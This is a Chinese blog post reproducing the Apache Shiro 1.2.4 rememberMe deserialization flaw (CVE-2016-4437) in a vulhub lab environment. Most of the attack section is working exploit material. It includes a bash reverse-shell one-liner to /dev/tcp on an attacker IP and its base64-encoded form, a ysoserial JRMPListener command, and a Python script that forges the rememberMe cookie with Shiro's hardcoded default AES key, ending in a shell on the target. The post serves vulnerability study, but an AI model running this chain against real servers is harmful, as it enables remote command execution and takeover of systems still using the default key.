Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

最新推荐文章于 2023-07-16 12:06:54 发布
最新推荐文章于 2023-07-16 12:06:54 发布
阅读量655 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: apache java 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guo15890025019/article/details/129461780
版权

目录

声明:本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任。

Apache Shiro简介

Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。

漏洞原理

Apache Shiro框架提供了记住我(rememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManage类中将cookie中rememberMe字段内容分别进行序列化、AES加密、Base64编码。

**漏洞分析:**Apache Shiro默认使用了CookieRememberMeManage,其处理cookie是的流程是:得到rememberMe的cookie值 > Base64解码 > AES解密 > 反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞

**漏洞特征:**在返回包的Set-Cookie中存在rememberMe=deleteMe字段

影响版本

Apache Shiro <= 1.2.4

漏洞复现

漏洞环境搭建采用vulhub,具体方式,这里不在赘述。环境启动后,浏览器访问一下

在这里插入图片描述
我们利用漏洞的最终目的是要远程执行命令(反弹shell),来获取服务器的权限

所以,我们先在攻击机上起nc监听

在这里插入图片描述

然后,将反弹shell命令:bash -i >& /dev/tcp/192.168.40.86/1234 0>&1,在https://ares-x.com/tools/runtime-exec/网站上做编码处理。

编码处理后:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQwLjg2LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}
在这里插入图片描述
备注:做这一步编码处理的原因是:Java下命令执行使用到的Runtime.getRuntime().exec(cmd),在处理带有| ,<,>,空格等符号的命令时,没办法正确执行,所以做Base64编码处理

Java反序列化漏洞利用,需要用到ysoserial这一个反序列化利用工具,而我们这次使用到的是其中的JRMP模块

JRMP模块利用方式如下:

一、 ysoserial中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用。

攻击流程如下:

需要发送payloads/JRMPLIstener内容到漏洞服务器中,在该服务器反序列化完成我们的payload后会开启一个RMI的服务监听在设置的端口上。
我们还需要在我们自己的服务器使用exploit/JRMPClient与存在漏洞的服务器进行通信,并且发送一个gadgets对象,达到一个命令执行的效果。(前面说过RMI协议在传输都是传递序列化,接收数据后进行反序列化操作。)
简单来说就是将一个payload发送到服务器,服务器反序列化操作该payload过后会在指定的端口开启RMI监听,然后通过exploit/JRMPClient 去发送攻击 gadgets对象。

二、第二种利用方式和上面的类似,exploit/JRMPListener作为攻击方进行监听,在反序列化漏洞位置发送payloads/JRMPClient向我们的exploit/JRMPListener进行连接,连接后会返回在exploit/JRMPListener的gadgets对象并且进行反序列化

攻击流程如下:

攻击方在自己的服务器使用exploit/JRMPListener开启一个rmi监听
往存在漏洞的服务器发送payloads/JRMPClient,payload中已经设置了攻击者服务器ip及JRMPListener监听的端口,漏洞服务器反序列化该payload后,会去连接攻击者开启的rmi监听,在通信过程中,攻击者服务器会发送一个可执行命令的payload(假如存在漏洞的服务器中有使用org.apacje.commons.collections包,则可以发送CommonsCollections系列的payload),从而达到命令执行的结果。

针对该漏洞,我们采用第二种利用方式

github上搜索并下载、编译ysoserial,得到ysoserial.jar包

运行指令(通过 ysoserial中的JRMP监听模块,监听 6666 端口并执行反弹shell命令)

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections5 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQwLjg2LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}'

在这里插入图片描述

接下来,编写脚本伪造cookie,脚本如下:

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext
 
if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])   
print ("rememberMe={0}".format(payload.decode()))

执行脚本 : python3 shiro.py 192.168.40.86:6666
在这里插入图片描述
页面登录,输入任意用户名和密码,并勾选Remember me ,BP抓包,并替换掉cookie内容

在这里插入图片描述
查看JRMPListener监听,可以看到JRMPClient的连接

在这里插入图片描述
查看nc反弹shell成功

在这里插入图片描述

Passer798
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Shiro 1.2.4反序列化漏洞
jxy158212的博客
02-24 690
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。
其他的 框架安全:Apache Shiro 漏洞序列.(CVE-2016-2807)
最新发布
网络安全领域___专研者.
05-12 546
Apache Shiro 是一个强大且易用的Java安全框架,它为应用程序提供了身份验证、授权、加密和会话管理等常见的安全功能。漏洞大多会发生在登录处,返回包里包含remeberMe=deleteMe字段。
shiro反序列化漏洞
qq_41696518的博客
06-27 1471
在请求包的Cookie中为 rememberMe字段赋任意值,收到返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段,说明目标有使用Shiro框架,可以进一步测试。,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。硬编码要求程序的源代码在输入数据或所需格式发生变化时进行更改,以便最终用户可以通过程序外的某种方式更改细节。在攻击机:192.168.43.131 中生成rememberMe。
Shiro反序列化漏洞CVE-2016-4437)+docker靶场+工具利用
weixin_46411728的博客
07-16 2162
shiro_attack_2.2
Apache shiro 1.2.4反序列化漏洞(CVE-2016-4437)
不知名白帽的博客
05-29 1131
Apache shiro 1.2.4反序列化漏洞。通过BP抓包,在返回包中存在rememberme=deleteme字段。利用专门的jar工具进行复现漏洞
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本中,存在一个严重的反序列化漏洞。这个漏洞主要与RememberMe服务的实现有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 ...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Shiro反序列化漏洞检测工具
01-05
1. **升级Shiro版本**:确保Shiro框架的版本高于1.2.4,因为从1.2.5开始,Apache Shiro已经修复了这个反序列化漏洞。 2. **禁用不必要的序列化**:避免在不受信任的输入上进行反序列化,尤其是在处理网络数据时。 3....
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞【原理扫描】
qq_46416934的博客
09-01 1157
系统将密钥硬编码在代码里,且在官方文档中并没有强调修改该密钥,导致框架使用者大多数都使用了默认密钥。检测漏洞ShiroConfig.java 是否包含 fCq+/xW488hMTCD+cmJ3aQ==,如果是使用的默认密钥则需要修改,防止被执行命令攻击。升级版本到 >=v.4.3.1(其实就是升级Shiro版本到1.7),并且重新生成一个新的秘钥替换cipherKey,保证唯一且不要泄漏。升级Shiro版本到 >=1.7,在调用的地方重新生成一个新的秘钥替换。都存在漏洞建议升级到shiro1.7版本。..
Apache Shiro 1.2.4反序列化漏洞
Tcho___的博客
03-17 657
Apache Shiro 1.2.4反序列化漏洞 shiro Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 shiro提供的rememberMe的功能,登入页面时勾选rememberMe
Apache Shiro 1.2.4反序列化漏洞复现
weixin_48739941的博客
04-21 502
(1) cd vulhub/shiro/CVE-2016-4437 切换目录。 (2)docker-compose up -d 启动。 (3)访问: http://192.168.43.128:8080/login;jsessionid=F8C504BD06F484504DDCD30D7410DABF (4)打开ShiroExploit.jar:java -jar .\ShiroExploit.jar,添加受害网站路径: http://192.168.43.128:8080/login
Apache Shiro 1.2.4命令执行(CVE-2016-4437)复现
Endeavour的博客
07-28 874
Shiro是什么? Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API, 怎么判断要测试的这个网站是否用到了Shiro框架?
漏洞复现 - Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437
菜鸟的测试世界
04-22 585
漏洞原理 Apache ShiroJava 的一个安全框架,可以帮助我们完成:认证、授权、加密、会话管理、与 Web 集成、缓存等功能,应用十分广泛。 Shiro最有名的漏洞就是反序列化漏洞了,加密的用户信息序列化后存储在名为remember-me的Cookie中,攻击者使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。这里最关键的切入点就是默认密钥了,这个漏洞已经出来5年多了,不知道为啥,实际工作中还是经常发现开发木有修改默认密钥。。。...
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437) 复现
yukinorong的博客
06-29 3218
基础知识 序列化和反序列化 反序列化漏洞原因 在Java反序列化中,会调用被反序列化的readObject方法,当readObject方法书写不当时就会引发漏洞反序列化的检测 基础库中隐藏的反序列化漏洞 优秀的Java开发人员一般会按照安全编程规范进行编程,很大程度上减少了反序列化漏洞的产生。并且一些成熟的Java框架比如Spring MVC、Struts2等,都有相应的防范反序列化的机制。如果仅仅是开发失误,可能很少会产生反序列化漏洞,即使产生,其绕过方法、利用方式也较为复杂。但
复现Apache Shiro 1.2.4反序列化漏洞
qq_54713392的博客
05-14 357
复现Apache Shiro 1.2.4反序列化漏洞 漏洞原理: Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命
Apache Shiro反序列化漏洞复现(Shiro550,CVE-2016-4437)
来到了学渣的博客
04-25 8978
Shiro是什么东西? ShiroJava 的一个安全框架,执行身份验证、授权、密码、会话管理 shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值